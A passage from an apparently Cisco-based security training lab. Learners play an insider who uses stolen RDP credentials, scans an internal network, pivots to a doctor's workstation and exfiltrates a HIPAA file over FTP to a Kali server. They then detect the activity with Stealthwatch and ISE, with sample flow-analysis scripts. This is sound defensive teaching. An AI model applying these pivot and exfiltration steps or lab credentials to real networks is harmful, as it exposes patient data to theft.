    Once you have finished exporting the stolen data, you will switch to the defender camp with the goal of detecting and preventing Mr. Brown from stealing the valuable data. You will have a basic understanding of how Cisco Stealthwatch can detect insider threats using NetFlow to identify unusual behavior as well as malicious actions within the network. You will also have briefly covered how Cisco Identity Services Engine (ISE) can quarantine any threats that Stealthwatch deemed a high concern, using the Stealthwatch concern index (CI) value and the Stealthwatch ISE integration. In this scenario, we will not remediate the insider threat, since that is the focus of the next scenario. Know that the same remediation capabilities used between Cisco Firepower and ISE covered in scenario 6 could also be set up between Cisco Stealthwatch and ISE. For more details on remediating insider threats, see scenario 6.

    Lab Resources

    • Attacker Resource 1: Kali Linux server sitting outside HackMDs network

    • Attacker Resource 2: Accessing Workstation on Wheels (WoW) inside HackMDs network with stolen login credentials.

    Note: Angry IP scanner is pre-installed on the WoW representing one of the many potential toolkits attackers would put on a compromised system.
    • Target Resource 1: Workstation on Wheels (WoW)

    • Target Resource 2: Dr. PC running Windows 7

    Note: FileZilla is pre-installed on the admin system representing one of the many potential data exfiltration toolkits attackers would put on a compromised system.
    • Defender Resource 1: Cisco Stealthwatch Management Console

    • Defender Resource 2: Cisco Identity Services Engine

    • Defender Resource 3: Any network device with NetFlow and 802.1x enabled

    Defending Insider Threats with Flow

    NetFlow, or network flow, is a feature introduced by Cisco routers giving administrators the ability to collect IP network traffic as it enters or exits an interface. By analyzing the data provided by NetFlow, an administrator can determine things such as the source and destination of traffic, class of service and causes of congestion. The key to NetFlow is that it can exist on common network equipment such as routers, switches, wireless access points, virtual networks (i.e., inside the data center) and so on.

    Further developments in harvesting flow have led to using NetFlow for security analytics. Technology such as Cisco Stealthwatch can determine potential threats based on behavior and network triggers, meaning security value is achieved without signatures, and the analysis constantly self-tunes as more NetFlow data is analyzed. By harvesting NetFlow for security, every network point becomes a security sensor looking for suspicious NetFlow trends.

    It is important to note that not all network equipment supports NetFlow; however, Cisco Stealthwatch Sensors can be used to convert raw traffic to NetFlow for those use cases.

    Note: Not all flow types are equal! sFlow (Sampled Flow), as an example, provides far less detail about potential threats than NetFlow version 9. Cisco Stealthwatch accepts most forms of NetFlow and IPFIX. Cisco defined and created the NetFlow standard, and it was several years and several different iterations before standards-based NetFlow was ratified by the IETF (IPFIX).

    In this attack scenario, Mr. Brown (you) will use the stolen credentials to access the WoW computer located within the HackMDs network. You will open a pre-installed network scanner on the WoW computer and perform reconnaissance within the network perimeter to map the rest of the internal network. You will identify devices within the sensitive network and choose a target to pivot to. Once you have connected to a server within the sensitive environment, you will seek out HIPAA related data and export it using a pre-installed FTP service.

    Note: Real attackers will spend long periods of time (months or even years) slowly pivoting and exporting data. This scenario will perform these steps quickly, as stealth isn’t a major concern. Regardless, we have seen real-world environments lacking internal defenses that therefore would not see this attack if it occurred within their environment!

    The username for accessing the Kali Linux attack server is root, and the password is C1sco12345.

    The stolen username for the WoW (Workstation on Wheels) system is dhowser and password is C1sco12345.

    Once you complete Mr. Brown’s mission, you will move to the defender side by accessing the insider SOC Jumphost. You will access the Stealthwatch Management Console (SMC) and look for the top threats, which will be the footprint of Mr. Brown’s actions. You will identify why Mr. Brown’s actions are true indications of compromise and cover how ISE can quarantine alarms from Stealthwatch due to a high concern index alarm. You will not perform remediation as that concept is the focus for scenario 6.

    Username for Cisco Stealthwatch Management Console (SMC) is admin, and the password is C1sco12345.

    Connect to HackMDs

    Mr. Brown, aka YOU, is currently outside of the HackMDs network. Mr. Black recently gave you stolen login credentials to an internal system so you can bypass HackMDs’ perimeter security. You identified the outside IP address of the WoW (198.19.30.100) during the reconnaissance you performed in Scenario 3. Let’s access that system now from the Kali Attack server.

    Procedure


     1   

    Connect to the Kali Linux server.

     2   

    Start a terminal session by clicking on the terminal emulator icon at the bottom of the Kali Linux desktop.

     3   

    Type service vsftpd start to start the Kali Linux FTP server that will be used to receive the data you are about to steal from HackMDs’ network. If you don’t do this, you may not be able to execute the FTP connection back to the Kali Linux system once you are inside the network and looking to export data.

    Note:  Remember Linux commands are case sensitive. If available, use the tab key to auto complete commands when you can.
     4   

    We are now going to remote desktop over to the WoW computer. You may believe these servers would never be exposed online; however, the following screenshot from the Shodan website shows how many IP addresses have this particular service exposed to the internet. Feel free to search Shodan yourself!

     5   

    This is sometimes done to provide remote access and facilitate remote work. This is not, however, a secure way to connect and should be avoided.

     6   

    From the Kali Linux terminal session, Remote Desktop to the WoW system using the command rdesktop -z -P -xm -k en-us 198.19.30.100:3389

     7   

    You will see WOW2\root as the login. Change it to the stolen credentials you know for Dr. Howser: username dhowser and password C1sco12345.

    Note: 

    You will not be able to type a backslash (“\”), so just edit around it.

    Now you are on the WoW computer meaning you are inside the HackMDs network!


    Internal Port Scanning

    Now that you are inside the HackMDs network, it is time to search inside this network for systems with data. We will perform some reconnaissance using the Angry IP scanner that Mr. Brown installed as part of his attack arsenal once he breached the network.
    Note: We installed this for you to save time. Real attackers will do similar things by installing tools on compromised systems.

    Procedure


     1   

    Double-click the icon labeled Angry IP Scanner.

     2   

    This will bring up the Angry IP scanner GUI. Change the IP Range from 198.19.10.0 to 198.19.10.255, and then click Start.

    Note:  If you are prompted to download a newer version, choose to ignore and proceed.
     3   

    When the scan completes, you will notice a few IP addresses were found with their corresponding hostnames. Click the Close button and then scroll through the list of IP addresses found by Angry IP Scanner.

    Note:  The number of IP Addresses and your exact output from Angry IP Scanner might vary. You may want to run it a few times to ensure you generate lots of events to hunt for later in this lab.
     4   

    Scroll down to the IP address 198.19.10.101, which looks interesting. Based on the hostname, this could be Dr. Howser’s workstation or something of similar value. It is likely to contain sensitive data of value or to give us access to other systems that have valuable data. You were told all workstations at HackMDs used by doctors have the same administration-level password, so next we will try pivoting to this system.


    Pivoting

    Procedure


     1   

    Reconnaissance has rewarded Mr. Brown with a few systems that look to contain confidential and sensitive data. One is the WoW (198.19.30.100) and the other is Dr. Howser’s system (198.19.10.101). Connect to the doctor’s system located at 198.19.10.101.

     2   

    From the WoW desktop, click the Remote Desktop icon on the desktop, or click the Start button and type remote desktop to bring up the Remote Desktop application in Windows.

     3   

    Type the IP address of 198.19.10.101 and click connect.

     4   

    Log in as dhowser with the password C1sco12345, then click OK. If you see a security prompt stating that the remote computer’s certificate cannot be verified, click Yes to continue.

    Now you will be inside Dr. Howser’s system. You should also see a file called HIPAA_Data.mp4 on the desktop, as shown in the example below. This is the confidential and sensitive data that you are after and that will be exfiltrated back to your remote server. Yes, this is very basic; however, real-world attacks involve not only finding the data files but then extracting them off the breached network. We are just simplifying the process in this lab example.

    Note:  We are using the HIPAA_Data.mp4 file so that the file is large enough to trigger a Cisco Stealthwatch data loss Host Lock Alarm. Host Lock Alarms are a common best practice when deploying Stealthwatch to monitor sensitive networks.

    Data Exfiltration

    Mr. Brown has found valuable data on an administrator’s system within HackMDs.com. Now it is time for you to exfiltrate those files to your remote server. Then, Mr. Black will post them to the dark web for sale. This can be accomplished using many tactics; however, in our lab, we will use a standard FTP application to exfiltrate this data. For this, we will use the FileZilla FTP client. Let’s assume Mr. Brown has already downloaded and installed the FileZilla FTP client program, even though there are many stealthier methods to exfiltrate files from remote networks.

    Note: If a new version is offered of FileZilla, just cancel and ignore it. We don’t need anything special here.

    Procedure


     1   

    From Dr. Howser remote desktop session, double click the FileZilla icon.

     2   

    This will bring up the FileZilla GUI. Type the Kali Linux IP address 198.18.133.6 for the host, hacker for the user, C1sco12345 for the password and 21 for the port, and then click the Quickconnect button to start the FTP session. You should now see the folder home/hacker appear to the right under Remote site.

    Note:  If you get an error about supporting unencrypted traffic, click OK.
    Note:  You may already see the file there, which is OK. Go ahead and replace the file. We want to perform this malicious action so later we can see it in Stealthwatch. The FTP GUI may be squished. You can expand it by dragging the bar under a window to make it easier to see the HIPAA_data file.
     3   

    On the left window, browse to the desktop and drag the HIPAA_Data.mp4 file to the hacker folder located on the Kali Linux attack server. It may be encrypted if you performed the Ransomware lab prior to this lab. That’s ok.


    Defending HackMDs with Stealthwatch

    You have accomplished your mission as the attacker. You accessed the HackMDs network remotely using stolen credentials, found an internal system and pivoted to that system. You identified HIPAA data and exported it to your external attack server using FTP. That data can now be sold by Mr. Black on the open market.

    Now, it is time to switch to the defender side and implement incident response steps to identify and eventually prevent Mr. Brown from stealing sensitive data. It is important to understand that once the defending team remediates the breach by Mr. Brown, they will need to look for other breaches and attempt to understand how Mr. Brown got in. With a little research, they should be able to identify how the system was accessed and issue a network wide password reset to void any other stolen credentials Mr. Green or others may have access to.

    In this exercise, you will start off by monitoring the internal HackMDs network for potential breaches using Stealthwatch. Mr. Brown’s scanning should have set off reconnaissance alarms, since that is not common behavior for internal users. Stealthwatch is also configured to monitor the .10 network as a “sensitive subnet” known for hosting HIPAA and other sensitive data. Mr. Brown’s connection from the Kali server to the inside devices, and then from those inside devices to the Dr. workstation found on the sensitive .10 network, will trigger alarms, including unauthorized services such as remote desktop connections as well as FTP.

    Note:  Identity Services Engine (ISE) can be set up to receive any high concern alarms from Stealthwatch and auto-quarantine any identified threats. We will not showcase that in this scenario, since it is the focus of scenario 6.
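    As an added example (not part of this lab and not Cisco or Stealthwatch code), the script below applies the flow-based reasoning described above, and in the NetFlow overview earlier in this scenario, to constructed NetFlow-style records: a Ping_Scan alarm when one host pings many addresses in the HIPAA subnet, Host_Lock violations for RDP or FTP into or out of the .10 subnet, and Suspect_Data_Loss for a large transfer to an outside peer, then rolls them up into a per-host concern index. The subnet, ports and addresses are the lab’s; the thresholds, CI weights, the 198.19.0.0/16 internal range, the FTP data-channel port and the byte counts are assumptions.

```python
"""Toy NetFlow-style analyzer for the insider-threat scenario.

Added example, not Cisco or Stealthwatch code. It consumes unidirectional
flow records (the fields NetFlow v9/IPFIX exports: addresses, protocol,
destination port, byte count) and raises three alarms modelled on the ones
this scenario walks through: Ping_Scan (recon), Host_Lock (RDP/FTP touching
the HIPAA subnet) and Suspect_Data_Loss (large outbound volume to an outside
peer). Subnet, ports and addresses come from the lab; thresholds, the
internal range and the concern-index weights are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

SENSITIVE = ip_network("198.19.10.0/24")      # HIPAA subnet monitored by the lab's SMC
INTERNAL = ip_network("198.19.0.0/16")        # assumed: HackMDs internal address space
HOST_LOCK_PORTS = {3389: "RDP", 21: "FTP"}    # services the lab treats as unauthorized there
PING_SCAN_MIN_TARGETS = 20                    # assumed threshold for the recon alarm
DATA_LOSS_MIN_BYTES = 50_000_000              # assumed threshold for suspect data loss
CI_WEIGHT = {"Ping_Scan": 1000, "Host_Lock": 300, "Suspect_Data_Loss": 500}  # assumed


@dataclass(frozen=True)
class Flow:
    """One unidirectional flow record (the subset of NetFlow v9 fields we need)."""
    src: str
    dst: str
    proto: int      # 1 = ICMP, 6 = TCP
    dport: int      # 0 for ICMP
    nbytes: int


def analyze(flows):
    """Return {alarm_type: [event, ...]}; each event names the host it is attributed to."""
    alarms = {"Ping_Scan": [], "Host_Lock": [], "Suspect_Data_Loss": []}
    icmp_targets = defaultdict(set)    # scanner -> set of sensitive hosts it pinged
    bytes_out = defaultdict(int)       # (sensitive src, external dst) -> bytes sent
    for f in flows:
        src, dst = ip_address(f.src), ip_address(f.dst)
        # Recon: ICMP from one host toward many addresses in the HIPAA subnet.
        if f.proto == 1 and dst in SENSITIVE:
            icmp_targets[f.src].add(f.dst)
        # Host lock: RDP or FTP control connection with either end in the HIPAA subnet.
        if f.proto == 6 and f.dport in HOST_LOCK_PORTS and (src in SENSITIVE or dst in SENSITIVE):
            alarms["Host_Lock"].append(
                {"host": f.src, "peer": f.dst, "service": HOST_LOCK_PORTS[f.dport]})
        # Data loss: any bytes leaving the HIPAA subnet for a peer outside the company.
        if src in SENSITIVE and dst not in INTERNAL:
            bytes_out[(f.src, f.dst)] += f.nbytes
    for scanner, targets in icmp_targets.items():
        if len(targets) >= PING_SCAN_MIN_TARGETS:
            alarms["Ping_Scan"].append({"host": scanner, "targets": len(targets)})
    for (src, dst), total in bytes_out.items():
        if total >= DATA_LOSS_MIN_BYTES:
            alarms["Suspect_Data_Loss"].append({"host": src, "peer": dst, "bytes": total})
    return alarms


def concern_index(alarms):
    """Accumulate a per-host score from the alarms, the way a CI builds up across events."""
    ci = defaultdict(int)
    for kind, events in alarms.items():
        for ev in events:
            ci[ev["host"]] += CI_WEIGHT[kind]
    return dict(ci)


# Constructed sample flows mirroring the scenario: the WoW (198.19.30.100) pings the
# HIPAA subnet, RDPs to Dr. Howser's PC (198.19.10.101), which then pushes a large
# file over FTP to the Kali host (198.18.133.6). The data-channel port and the byte
# counts are made up; 203.0.113.10 is a documentation address standing in for
# ordinary outbound traffic.
SAMPLE_FLOWS = (
    [Flow("198.19.30.100", f"198.19.10.{i}", 1, 0, 84) for i in range(1, 41)]
    + [Flow("198.19.10.3", f"198.19.10.{i}", 1, 0, 84) for i in (1, 2, 101)]  # benign pings
    + [
        Flow("198.19.30.100", "198.19.10.101", 6, 3389, 2_400_000),   # RDP pivot
        Flow("198.19.10.101", "198.18.133.6", 6, 21, 1_200),          # FTP control channel
        Flow("198.19.10.101", "198.18.133.6", 6, 54123, 61_000_000),  # FTP data channel
        Flow("198.19.10.101", "198.19.10.3", 6, 445, 900_000),        # internal SMB, not counted
        Flow("198.19.10.101", "203.0.113.10", 6, 443, 480_000),       # small HTTPS, below threshold
    ]
)

if __name__ == "__main__":
    found = analyze(SAMPLE_FLOWS)
    for kind, events in found.items():
        for ev in events:
            print(f"{kind:18} {ev}")
    print("concern index:", concern_index(found))
```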

    Procedure


     1   

    If needed, connect back to the Jumphost using the username administrator and password C1sco12345.

     2   

    In the web browser find the SMC tab, or use the browser bar to access the ‘Stealthwatch Management Console’ found by going to https://198.19.10.6. Log in with the username of admin and password C1sco12345.

    You should now see the main Stealthwatch Management Console (SMC) dashboard. This dashboard shows the alarm highlights; these are the top security events you should be evaluating. This network data comes from any device that generates NetFlow (routers, switches, virtual network devices, security appliances, wireless devices, etc.).

     3   

    Click the Recon alarm number. Explore the Security Insight Dashboard.

     4   

    This will bring up a list of recent recon activity. We can see there have been scans from 198.19.30.100, indicating this system has been breached and is searching for new systems to pivot to. Click the IP address link associated with the IP address identified (not the circle icon).

    This will bring up a list of recent malicious activity such as the recent recon associated to this IP address. We can also see additional information including the Host Summary, Traffic by Peer Host Group, Alarms by Type, Users & Sessions and Application Traffic for both Internal and External traffic.

     5   

    Scroll over to the Alarms by Type bar graph to show the various types of alarms triggered by this host. You can clearly see the Recon and Ping_Scan behavior. If you click one of the bars such as the Ping_Scan, you will see a specific screen showing details about that alarm. Let’s click the Ping_Scan bar to see those details. The color may be different so use the color key to make sure you select Ping_Scan.

     6   

    The Alarms by Type view shows that 198.19.30.100 has scanned the HIPAA subnet, represented by 198.19.10.0/24, via the user dhowser. Click View Details to see what this activity is all about.

     7   

    Click View Details to bring up the “concern index” this represents and the type of security event, which is a Ping_Scan. The concern index is extremely high, probably in the thousands, meaning this is part of a really bad event. You can see the details of this event by clicking the caret next to “Ping_Scan”, which explains what the activity is all about. The next step for our investigation should be to see if we have any activity within that .10 environment, since it may have been compromised due to the scanning activity we are investigating.

     8   

    Click Dashboard and select Network Security to return back to the main dashboard.

     9   

    Now let’s look at the top alarm widget to see if any devices on the .10 network have shown any behavior of concern. At first, you may see a few systems that have been scanned, shown as RC (recon). You may also see a PV (policy violation) alarm for the 198.19.10.3 system, representing unwanted activity within this network. After 3-5 minutes, you should see the IP 198.19.10.101 pop up with an EX (exfiltration) alarm! You will need to look into that! Click 198.19.10.101 to see more details on this system. Make sure to click the actual IP address and not the EX icon. You can also click the Exfiltration module at the top under the Alarming Hosts section to find the latest systems performing data exfiltration.

    This will bring up a screen focusing on this particular system that generated the EX alarm. You can see a Peer Host Group mapping representing this server containing HIPAA data has connected to a host on the outside network and an unknown person. This would be REALLY bad.

    Scroll down and you can view application layer data including Remote Desktop communication. This shows a laptop within the HIPAA network is being remotely accessed. That’s bad!

    You are able to remove this user by clicking the Quarantine link. Don’t do that as we will be showcasing ISE remediation in the next scenario. You can view this quarantine button under the user Host Summary. If you do click it, it will perform a similar quarantine as what we do in the next module. Know that a quarantine in ISE can mean whatever you configure it to do.

    • Any of these events would be a cause for major concern. The combination of these activities would produce a high Concern Index (CI) that could automatically be reported to other systems, such as the Cisco Identity Services Engine (ISE), for auto remediation and/or quarantine.

    • The Stealthwatch GUI shows a lot of data; however, with the addition of the Stealthwatch Java application, you can see even more details on security and network events. Feel free to explore the Stealthwatch Java application in the advanced lab.

    Note:  Events found in Stealthwatch can be acted on using automated integration with tools like Cisco ISE. Later in this demo, you will showcase this concept by automatically removing threats found by Cisco Firepower by connecting to the Cisco ISE server using pxGrid communications. The same exact configuration that can be setup between Cisco Stealthwatch and Cisco ISE can also be setup with other pxGrid enabled remediation tools.

    Advanced Bonus Lab - Defending HackMDs with Stealthwatch [Advanced]

    Procedure


     1   

    Connect to the Jumphost.

     2   

    Click the icon on the desktop that states to launch the SMC.

    Note:  If you receive a warning to update the Java application, say Later and continue.
     3   

    Log in to the Stealthwatch Management Console using the username admin, password C1sco12345, and enter the SMC IP address 198.19.10.6.

     4   

    You should now see the main Stealthwatch Management Console (SMC) dashboard. On the left is a list of network devices feeding NetFlow to the Stealthwatch Collector, as well as the Stealthwatch Sensor that turns raw traffic into NetFlow. You can see the additional list of devices by clicking on the + button next to each section to expand the list.

     5   

    The panels on the right of the screen represent two main tabs. The first is “SOC – Traffic – Patient Data” and the other is “Cyber Threats”. Cyber Threats is a dashboard monitoring the entire network, whereas SOC – Traffic – Patient Data is a dashboard monitoring only the sensitive network containing HIPAA data. This makes it much easier for the admin to focus on different networks with different priorities to the business. Click the SOC – Traffic – Patient Data tab so we can focus there. We start here because the GUI showed a major concern regarding 198.19.10.101 performing data exfiltration.

     6   

    After clicking the SOC – Traffic – Patient Data tab, click the Alarm Summary tab to view the current security alarms within the SOC focused part of the network (i.e., where the HIPAA systems are located). You should see similar data to what was found in the GUI. In this example, we can see 198.19.10.101 shows data exfiltration. Let’s double-click the 198.19.10.101 address to see more details about this.

     7   

    You can see different tabs that provide details about this host IP address. The “Top Active Flows” tab shows the outside attacker host 198.18.133.6 and the inside HIPAA host 198.19.10.101 using an FTP connection over port 3389. This means somebody used FTP to pull data from the HackMDs internal sensitive network!

     8   

    Click the Security Events (not Security) tab. This shows that an IP address outside of the HackMDS network is the one behind the RDP connection. In this example, 198.19.30.100 was used by 198.18.133.6 to access the 198.19.10.101 system. We can also see FileZilla was used, as well as host lock violations triggered around the 198.19.30.100 and 198.18.133.6 addresses. Host lock violations could trigger a quarantine if a tool such as Cisco ISE was configured to do so, which would have prevented this event from occurring!

     9   

    NetFlow doesn’t lie! To see the user account behind this behavior, click the Identity, DHCP & Host Notes tabs to see the username is dhowser.

     10   

    Go back to the SOC – Traffic – Patient Data tab window, then click the Recon tab to show the scanning activity you created as Mr. Brown. This level of port scanning happening within the HIPAA network would be concerning.

     11   

    Click the Security tab and you will see the same 198.19.10.3 device within the HIPAA network has been associated with scans. Clicking the Host Locking tab will show remote desktop (RDP) violations have occurred.

     12   

    Let’s go back to the SOC – Traffic – Patient Data tab and look at the Alarm summary again. This time click Suspect Data Loss. Note that the color may be different than our example in the pie chart.

     13   

    This will bring up data identified as leaving our HIPAA network. You can see the user involved is dhowser.

     14   

    To view details on this data loss event, right-click the IP address for dhowser’s computer aka the 198.19.10.101 IP address and select Peer vs Port. This will bring up a visual of what’s going on.

     15   

    This gives a simple view of the situation. Here you can clearly see a large amount of data has left the HIPAA network to some outside IP address 198.18.133.6. This would be a very impactful diagram to show to anybody concerned about data leaving the HIPAA environment!

     16   

    Finally, we can view the overall network view of the HIPAA environment by clicking the SOC – Traffic – Patient Data and selecting the Network tab. Here, we can see a few protocols and activity that should be a concern from this type of environment. We can see both FTP and RDP traffic, which should raise alarms! Note the colors may be different in the chart.

    At this point, you have identified the breach using various techniques. With Identity Services Engine, you could have any high concern index systems quarantined automatically, while they are investigated. We didn’t do that in this scenario since that is the focus of the next scenario.

    The key to this situation is that Stealthwatch was able to let the HackMDs administration know there has been a breach, based on the reconnaissance activity, pivoting, connection to the HIPAA sensitive system network, unauthorized FTP services and finally, data being exfiltrated to the outside network. Traditional security technologies like firewalls, IPS and anti-virus would most likely miss this attack. Only a behavior-based technology could catch a true insider threat such as the one we just dealt with. Fortunately for HackMDs, their network (switches) was able to detect this threat using NetFlow security technology.

    This approach breaks down all the different types of network traffic seen within the classified network. Here you can see there was unauthorized FTP traffic leaving this environment, unauthorized RDP traffic within the environment, and the hosts involved with these obviously bad actions. This dashboard would be a simple way to glance at the traffic and figure out there is a big problem!
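The flow-based checks the two paragraphs above describe, written out as an added example (this is not Stealthwatch code or part of the lab): constructed NetFlow-style records are scored against the HackMDs policy, flagging FTP leaving the 198.19.10.0/24 HIPAA segment, RDP reaching it (host locking), and one non-HIPAA source touching many HIPAA hosts (reconnaissance). The 198.19.0.0/16 internal range, the data-loss byte threshold and the recon host count are assumptions.

```python
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Address space from the lab: the HIPAA segment is 198.19.10.0/24; the wider
# internal range (VPN pool on .40, contractor hosts on .30, ...) is assumed
# to be 198.19.0.0/16. Anything else counts as "outside".
HIPAA_NET = ip_network("198.19.10.0/24")
INTERNAL_NET = ip_network("198.19.0.0/16")

FTP_PORTS = {20, 21}
RDP_PORT = 3389
EXFIL_BYTES = 50 * 1024 * 1024   # assumed "Suspect Data Loss" threshold (50 MB)
RECON_TARGETS = 8                # assumed: distinct HIPAA hosts touched by one source


@dataclass(frozen=True)
class Flow:
    """One unidirectional flow record, reduced to the fields the checks need."""
    src: str
    dst: str
    dport: int
    nbytes: int   # bytes carried from src to dst


def zone(ip: str) -> str:
    addr = ip_address(ip)
    if addr in HIPAA_NET:
        return "hipaa"
    if addr in INTERNAL_NET:
        return "internal"
    return "outside"


def classify_flow(f: Flow) -> list[str]:
    """Policy violations raised by a single flow (empty if the flow is allowed)."""
    hits: list[str] = []
    s, d = zone(f.src), zone(f.dst)
    # FTP is unauthorized out of the HIPAA segment; a large transfer is data loss.
    if f.dport in FTP_PORTS and s == "hipaa" and d != "hipaa":
        hits.append("ftp-out-of-hipaa")
        if f.nbytes >= EXFIL_BYTES:
            hits.append("suspect-data-loss")
    # Host locking: RDP into HIPAA from anywhere else, or from outside into
    # any internal host, is a violation.
    if f.dport == RDP_PORT and (
        (d == "hipaa" and s != "hipaa") or (s == "outside" and d != "outside")
    ):
        hits.append("host-lock-rdp")
    return hits


def triage(flows: list[Flow]) -> dict[str, list[str]]:
    """Aggregate per-flow violations by source and add a reconnaissance alarm
    for any non-HIPAA source that touches many distinct HIPAA hosts."""
    alarms: dict[str, set[str]] = defaultdict(set)
    hipaa_targets: dict[str, set[str]] = defaultdict(set)
    for f in flows:
        alarms[f.src].update(classify_flow(f))
        if zone(f.dst) == "hipaa" and zone(f.src) != "hipaa":
            hipaa_targets[f.src].add(f.dst)
    for src, targets in hipaa_targets.items():
        if len(targets) >= RECON_TARGETS:
            alarms[src].add("recon-hipaa")
    return {src: sorted(a) for src, a in alarms.items() if a}


# Constructed sample flows mirroring the lab's story: an RDP pivot into the
# doctor's workstation, a large FTP transfer out to the attacker, a normal
# HTTPS flow, and a sweep of the HIPAA /24 from the VPN pool.
SAMPLE_FLOWS = [
    Flow("198.19.30.100", "198.19.10.101", 3389, 120_000),
    Flow("198.19.10.101", "198.18.133.6", 21, 180 * 1024 * 1024),
    Flow("198.19.10.101", "198.19.10.3", 443, 4_000),
] + [Flow("198.19.40.60", f"198.19.10.{i}", 445, 60) for i in range(1, 13)]

if __name__ == "__main__":
    for src, names in triage(SAMPLE_FLOWS).items():
        print(f"{src}: {', '.join(names)}")
```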

    Congratulations! You have now completed this scenario.


    Compromised Hosts: Control Access and Monitor Malicious Threats

    Value Proposition: It is critical that you know who and what can access your network. It is also critical to automatically enforce proper policy. This includes all aspects of network access meaning LAN, Wireless and VPN from guests to the CEO. Gaps in coverage expose you to the risk of having a system bypass your perimeter security with direct access to network resources.

    Best practice is having policy enforcement happen upon connection, meaning provisioning only the necessary network services based on the device connecting and its current posture state. The industry calls this provisioning least privilege access rights. The term “Posture” means validating whether a device is high risk because it lacks the latest updates, anti-virus and so on; which checks are performed is configurable by the organization.

    Access control as a technology faces numerous challenges, one of which is that devices, once admitted, are not observed in what they do or what they are (for example, IoT devices). In many cases, access control is equivalent to the doorman or bouncer at a nightclub. Gaps left by access control can be overcome with breach detection technologies. Some of these technologies are Intrusion Detection and Prevention Systems (IDS or IPS). Other examples of breach detection use anomaly detection capabilities. Flow-based anomaly detection systems have the advantage of being able to be placed pervasively throughout the network. This scenario will showcase this concept in full action!

    In this scenario, a HackMDs user’s laptop has been compromised by Mr. White and will be used as a proxy point to get into the network. The inside attacker we are calling Mr. Red will connect over VPN representing a remote user connecting back to the corporate network without knowing they are compromised.

    Mr. White (you) will use that trusted remotely connected asset as a proxy point to get internal access to the HackMDs network. Mr. White will need to download a payload that will install software needed to obtain keyboard access to the infected system and will attempt to scan for other devices to establish a foothold within the HackMDs environment. Both the download of the malicious file and internal reconnaissance activity will trigger critical Cisco Firepower alarms that will in turn inform Cisco Identity Services Engine to quarantine the endpoint seen as an internal threat.

    Outcome

    At the end of this scenario, you will have a basic understanding of how access control and internal security solutions can work together to prevent real world cyber threats. You will access the HackMDs network over VPN however, the same policy could be enforced for LAN and Wireless connections. HackMDs will have Cisco Firepower IPS monitoring the internal network for threats, which you will trigger by connecting to the HIPAA network and performing malicious actions. These actions will cause Firepower to inform Cisco Identity Services Engine (ISE) that the user associated with the violations needs to be quarantined.

    On the defender side, you will explore Cisco Firepower and Cisco Identity Services Engine (ISE) to validate the access policy for HackMDS has prevented the threat.

    You will be the attacker abusing a compromised system. You will be the defender preventing Mr. Black from accessing the HIPAA network!

    Lab Resources

    • Attacker Resource 1: Compromised Windows laptop used to access HackMDs

    • Target Resource 1: Hosts such as a Doctor’s workstation (198.19.10.101) on the HIPAA network

    • Defender Resource 1: Cisco Identity Services Engine

    • Defender Resource 2: Cisco Firepower

    • Defender Resource 3: Cisco Umbrella roaming client on Cisco AnyConnect

    • Defender Resource 4: The network using 802.1x for enforcing access control

    Deploying 802.1x for Access Control

    Note: EasyConnect provides port-based authentication. EasyConnect is like 802.1X, but it is easier to implement. EasyConnect learns about the authentication from Active Directory and provides session tracking for active network sessions. Session Directory notifications can be published with pxGrid.

    In this attack scenario, a compromised host tagged as Mr. Red will give Mr. White (you) access to the HackMDs internal network. You will simulate the compromised host connecting back to the HackMDs network by enabling a Cisco AnyConnect VPN connection, as many remote workers would do. Once inside the network, you will attempt to identify other devices on the same network using port scanning behavior. This action will trigger a Firepower IPS alarm that is monitoring for unauthorized behavior within the HIPAA network. The result will be an alarm in Firepower sent to Cisco ISE to have the system bounced from the VPN network. You will find that the remote user has been placed in a quarantine policy. You will click a link to remove that system from the quarantine policy and attempt to download the malicious payload, which represents another type of post-compromise behavior. This will once again cause the remote system to be placed into the quarantine network.

    As a defender, you will access the Firepower system to identify the threat and learn how Firepower could identify this type of insider behavior. You will also log into the Cisco ISE and validate the details behind the system Firepower had told ISE to remove from the network.

    Note: There are more versions of Cisco security solution integrations. Cisco ISE is built to be the context provider (which tells solutions more about an IP such as what it is, where it is and so on) and bouncer when another solution identifies a system is a threat to the environment. Other solutions that could leverage ISE are SIEMs such as Splunk, vulnerability scanners such as Rapid7’s InsightVM, or other Cisco technologies such as Stealthwatch. You will find these integrations within the CDC environment.
    • Username to access the compromised host is admin, and the password is C1sco12345.

    • Username for Cisco Firepower is admin, and the password is C1sco12345.

    • Username for Cisco ISE is admin, and the password is C1sco12345.

    Connect to the compromised system

    Note: It is important that you complete the connectivity scenario prior to starting this part of the lab to ensure pxGrid is established between Cisco ISE and Firepower.

    Procedure


     1   

    Connect to the Jumphost.

     2   

    Double-click the Contractor RDP icon to access the contractor’s laptop that represents the compromised laptop.

    Note:  To keep the lab consistent, you are starting on the Jumphost and remotely accessing the compromised system. This is a preliminary step; the actual story starts when you are at the compromised system.
     3   

    This will prompt you to log in as dhowser. Type the password C1sco12345.

     4   

    You will have the option to choose admin or contractor. Select dhowser as your login. Now you are connected to the contractor dhowser's laptop.


    Connect to HackMDs over VPN

    At this point, you should be using the compromised laptop. You need to establish a VPN connection that represents a remote user who is infected with malware connecting back to the corporate network.

    Procedure


     1   

    Click the Cisco AnyConnect icon and select connect. In a moment, the VPN connection will be established.

     2   

    When you are asked to accept the certificate, click Connect Anyway. You should see the VPN is connected.

    Observe that Cisco AnyConnect offers a lot more capabilities than a traditional VPN. Capabilities are enabled as cloud-based services or integrations with Cisco technologies. There are a few features we have enabled in this lab. First, we have Cisco ISE looking for a hidden file, meaning Cisco AnyConnect is acting as the ISE posture agent. This represents the requirement to validate that a computer is a corporate-issued device rather than a personal device. Employees may know the login information, but they will also need the hidden file in order to pass the system scan. The system scan can also check for almost anything, including whether updates are installed, whether antivirus is running, or the presence of hidden certificates.

    • Notice that another capability we have enabled for this lab is Cisco Umbrella.

      Umbrella provides a cloud-based firewall called the Secure Internet Gateway (SIG) with web filtering and reputation security. The SIG enables security to follow the user anywhere they travel in the world. This is ideal for ensuring HackMDS’s policies are enforced, regardless of how the device connects to the network.

    • Below is a high-level summary of the types of capabilities and integrations available with Cisco AnyConnect.

    • At this point, you are on the standard employee network and have passed all requirements to be given access.

    Note:  This network does not have segmentation set up that would prevent a user from directly communicating with the HIPAA network. In the real world, network isolation would be used to ensure untrusted devices can’t access trusted devices. Because of time constraints for lab development, network segmentation practices that would require more steps to bypass were not built in.
     3   

